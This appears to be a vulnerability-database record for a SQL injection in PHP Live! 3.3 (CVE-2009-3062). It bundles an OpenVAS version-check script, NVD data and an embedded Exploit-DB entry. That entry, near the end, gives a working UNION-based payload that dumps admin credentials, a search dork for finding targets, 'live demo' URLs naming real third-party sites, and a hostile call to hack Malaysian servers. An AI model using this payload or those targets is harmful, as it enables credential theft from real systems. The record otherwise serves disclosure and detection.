ID OPENVAS:1361412562310100303 Type openvas Reporter Copyright (C) 2009 Greenbone Networks GmbH Modified 2020-05-08T00:00:00
Description
PHP Live! is prone to an SQL-injection vulnerability because it
fails to sufficiently sanitize user-supplied data before using it in an SQL query.
###############################################################################
# OpenVAS Vulnerability Test
#
# PHP Live! 'deptid' Parameter SQL Injection Vulnerability
#
# Authors:
# Michael Meyer
#
# Copyright:
# Copyright (c) 2009 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
if (description)
{
script_oid("1.3.6.1.4.1.25623.1.0.100303");
script_version("2020-05-08T08:34:44+0000");
script_tag(name:"last_modification", value:"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)");
script_tag(name:"creation_date", value:"2009-10-11 19:51:15 +0200 (Sun, 11 Oct 2009)");
script_bugtraq_id(36226);
script_cve_id("CVE-2009-3062");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_name("PHP Live! 'deptid' Parameter SQL Injection Vulnerability");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/36226");
script_xref(name:"URL", value:"http://www.phplivesupport.com/?freshmeat");
script_tag(name:"qod_type", value:"remote_banner");
script_category(ACT_GATHER_INFO);
script_family("Web application abuses");
script_copyright("Copyright (C) 2009 Greenbone Networks GmbH");
script_dependencies("phplive_detect.nasl");
script_require_ports("Services/www", 80);
script_mandatory_keys("phplive/detecred");
script_tag(name:"summary", value:"PHP Live! is prone to an SQL-injection vulnerability because it
fails to sufficiently sanitize user-supplied data before using it in an SQL query.");
script_tag(name:"impact", value:"Exploiting this issue could allow an attacker to compromise the
application, access or modify data, or exploit latent vulnerabilities in the underlying database.");
script_tag(name:"affected", value:"PHP Live! 3.3 is vulnerable, other versions may also be affected.");
script_tag(name:"solution_type", value:"WillNotFix");
script_tag(name:"solution", value:"No known solution was made available for at least one year
since the disclosure of this vulnerability. Likely none will be provided anymore.
General solution options are to upgrade to a newer release, disable respective features,
remove the product or replace the product by another one.");
exit(0);
}
include("http_func.inc");
include("version_func.inc");
port = http_get_port(default:80);
if(!version = get_kb_item(string("www/", port, "/phplive")))exit(0);
if(!matches = eregmatch(string:version, pattern:"^(.+) under (/.*)$"))exit(0);
vers = matches[1];
if(!isnull(vers) && vers >!< "unknown") {
if(version_is_equal(version: vers, test_version: "3.3")) {
security_message(port:port);
exit(0);
}
}
exit(0);
{"id": "OPENVAS:1361412562310100303", "type": "openvas", "bulletinFamily": "scanner", "title": "PHP Live! 'deptid' Parameter SQL Injection Vulnerability", "description": "PHP Live! is prone to an SQL-injection vulnerability because it\n fails to sufficiently sanitize user-supplied data before using it in an SQL query.", "published": "2009-10-11T00:00:00", "modified": "2020-05-08T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100303", "reporter": "Copyright (C) 2009 Greenbone Networks GmbH", "references": ["http://www.securityfocus.com/bid/36226", "http://www.phplivesupport.com/?freshmeat"], "cvelist": ["CVE-2009-3062"], "lastseen": "2020-05-12T17:33:29", "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-3062"]}, {"type": "exploitdb", "idList": ["EDB-ID:9578"]}, {"type": "openvas", "idList": ["OPENVAS:100303"]}], "modified": "2020-05-12T17:33:29", "rev": 2}, "score": {"value": 6.7, "vector": "NONE", "modified": "2020-05-12T17:33:29", "rev": 2}, "vulnersScore": 6.7}, "pluginID": "1361412562310100303", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# PHP Live! 'deptid' Parameter SQL Injection Vulnerability\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100303\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-10-11 19:51:15 +0200 (Sun, 11 Oct 2009)\");\n script_bugtraq_id(36226);\n script_cve_id(\"CVE-2009-3062\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_name(\"PHP Live! 'deptid' Parameter SQL Injection Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/36226\");\n script_xref(name:\"URL\", value:\"http://www.phplivesupport.com/?freshmeat\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_dependencies(\"phplive_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phplive/detecred\");\n\n script_tag(name:\"summary\", value:\"PHP Live! is prone to an SQL-injection vulnerability because it\n fails to sufficiently sanitize user-supplied data before using it in an SQL query.\");\n\n script_tag(name:\"impact\", value:\"Exploiting this issue could allow an attacker to compromise the\n application, access or modify data, or exploit latent vulnerabilities in the underlying database.\");\n\n script_tag(name:\"affected\", value:\"PHP Live! 3.3 is vulnerable, other versions may also be affected.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year\n since the disclosure of this vulnerability. Likely none will be provided anymore.\n General solution options are to upgrade to a newer release, disable respective features,\n remove the product or replace the product by another one.\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\n\nport = http_get_port(default:80);\nif(!version = get_kb_item(string(\"www/\", port, \"/phplive\")))exit(0);\nif(!matches = eregmatch(string:version, pattern:\"^(.+) under (/.*)$\"))exit(0);\n\nvers = matches[1];\n\nif(!isnull(vers) && vers >!< \"unknown\") {\n if(version_is_equal(version: vers, test_version: \"3.3\")) {\n security_message(port:port);\n exit(0);\n }\n}\n\nexit(0);\n", "naslFamily": "Web application abuses", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:40:05", "description": "SQL injection vulnerability in message_box.php in OSI Codes PHP Live! 3.3 allows remote attackers to execute arbitrary SQL commands via the deptid parameter.", "edition": 4, "cvss3": {}, "published": "2009-09-03T17:30:00", "title": "CVE-2009-3062", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3062"], "modified": "2017-09-19T01:29:00", "cpe": ["cpe:/a:phplivesupport.:phplive\\!:3.3"], "id": "CVE-2009-3062", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3062", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:phplivesupport.:phplive\\!:3.3:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-02T21:14:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3062"], "description": "PHP Live! is prone to an SQL-injection vulnerability because it\nfails to sufficiently sanitize user-supplied data before using it in\nan SQL query.\n\nExploiting this issue could allow an attacker to compromise the\napplication, access or modify data, or exploit latent vulnerabilities\nin the underlying database.\n\nPHP Live! 3.3 is vulnerable; other versions may also be affected.", "modified": "2017-01-17T00:00:00", "published": "2009-10-11T00:00:00", "id": "OPENVAS:100303", "href": "http://plugins.openvas.org/nasl.php?oid=100303", "type": "openvas", "title": "PHP Live! 'deptid' Parameter SQL Injection Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: phplive_36226.nasl 5016 2017-01-17 09:06:21Z teissa $\n#\n# PHP Live! 'deptid' Parameter SQL Injection Vulnerability\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"PHP Live! is prone to an SQL-injection vulnerability because it\nfails to sufficiently sanitize user-supplied data before using it in\nan SQL query.\n\nExploiting this issue could allow an attacker to compromise the\napplication, access or modify data, or exploit latent vulnerabilities\nin the underlying database.\n\nPHP Live! 3.3 is vulnerable; other versions may also be affected.\";\n\n\nif (description)\n{\n script_id(100303);\n script_version(\"$Revision: 5016 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-01-17 10:06:21 +0100 (Tue, 17 Jan 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-11 19:51:15 +0200 (Sun, 11 Oct 2009)\");\n script_bugtraq_id(36226);\n script_cve_id(\"CVE-2009-3062\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_name(\"PHP Live! 'deptid' Parameter SQL Injection Vulnerability\");\n\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/bid/36226\");\n script_xref(name : \"URL\" , value : \"http://www.phplivesupport.com/?freshmeat\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2009 Greenbone Networks GmbH\");\n script_dependencies(\"phplive_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"version_func.inc\");\n\nport = get_http_port(default:80);\nif(!get_port_state(port))exit(0);\n\nif (!can_host_php(port:port)) exit(0);\n\nif(!version = get_kb_item(string(\"www/\", port, \"/phplive\")))exit(0);\nif(!matches = eregmatch(string:version, pattern:\"^(.+) under (/.*)$\"))exit(0);\n\nvers = matches[1];\n\nif(!isnull(vers) && vers >!< \"unknown\") {\n\n if(version_is_equal(version: vers, test_version: \"3.3\")) {\n security_message(port:port);\n exit(0);\n }\n\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-01T10:54:39", "description": "PHP Live! 3.3 (deptid) Remote SQL Injection Vulnerability. CVE-2009-3062. Webapps exploit for php platform", "published": "2009-09-02T00:00:00", "type": "exploitdb", "title": "PHP Live! 3.3 deptid Remote SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3062"], "modified": "2009-09-02T00:00:00", "id": "EDB-ID:9578", "href": "https://www.exploit-db.com/exploits/9578/", "sourceData": "*************************************************************************\n, . | | o | \n| |,---.,---., .,---.,---.,---.,---.,---|,---.,---.| .,---.|__/ \n`---'| || || |,---|| ,---|| | ||---'| | || || \\ \n | `---'`---|`---|`---^`---'`---^` `---'`---'` `---'`` '` `\n ` `---'`---' \n*************************************************************************\n[o] PHP Live! 3.3 (deptid) Remote SQL Injection\n\n\t\t\t--==[ Author ]==--\n[+] Author\t: v3n0m\n[+] Contact\t: v3n0m666[at]live[dot]com\n[+] Blog\t: http://0wnage.wordpress.com/\n[+] Group\t: YOGYACARDERLINK\n[+] Site\t: http://yogyacarderlink.web.id/\n[+] Date\t: September, 02-2009 [INDONESIA]\n*************************************************************************\n\t\t\t--==[ Details ]==--\n[+] Software\t: PHP Live! Chat\n[+] Version \t: v3.3\n[+] Vendor \t: http://www.phplivesupport.com/\n[+] Price\t: $49.95\n[+] Vulnerable\t: Remote SQL Injection\n[+] Google Dork\t: \"Powered by PHP Live! v3.3\"\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n\n[-] Exploit:\n[+] -999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0+from+chat_admin--\n\n[-] Remote SQLi p0c:\n[+] http://127.0.0.1/[path]/message_box.php?theme=&l=[username]&x=[xxx]&deptid=-999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0+from+chat_admin--\n [xxx] = Valid x number\n\n[-] Demo Live:\n[+] http://www.edunet-help.com/message_box.php?theme=&l=sekolahmy&x=1&deptid=-999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0+from+chat_admin--\n\n[+] https://www.guestcentric.com/support/message_box.php?theme=&l=guestcentric_wb&x=1&deptid=-999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0+from+chat_admin--\n\n\nFYI: Think twice before you buy these vulnerable script for $49.95 ?\n\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n\nSpecial Thanks\t=> str0ke & milw0rm\nRedLine Crew\t=> Bang Musa,Bang Yuan Rasugi Sang,Mas Andre,Dagol,Yazid\n\t\t=> Ogie,Angga,Indah Boing,by-y0u Pletokan,Andrew\nYOGYACARDERLINK => lingah,LeQhi,-Jali,Anak_Naga_,g0nz,IdioT_InsidE,aRiee\n\t\t=> yoga0400,ghareng,eidelweiss,pKi,kaka11,z0mb13,Travis Eshan\n\t\t=> & para gay yogyagaylink bruakakakakakakak\nOthers\t\t=> g0par Santiago,Don Tukulesto,mixbrainwasher\n\t\t=> badkiddies,broken_hack,M364TR0N & ALL MOSLEM HACKERS\nBig Thanks\t=> mywisdom [nice 0-day, you're 31337]\n\t\t=> yadoy666 [Mari kita ganyang malingsianjink]\n\t\t=> Angela Zhang [kamu cantik,eksotis & mengerikan] (=^_^=)\n\n* Fuck to Malaysia <= the truly thief asia\n be carefull your culture art & song,island get stolen and claimed by them\n letz we hack they sites & servers !! PROUD TO BE INDONESIAN !!\n* 11:20pm in my bedroom, preparing office goes on...!!\n\n# milw0rm.com [2009-09-02]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/9578/"}]}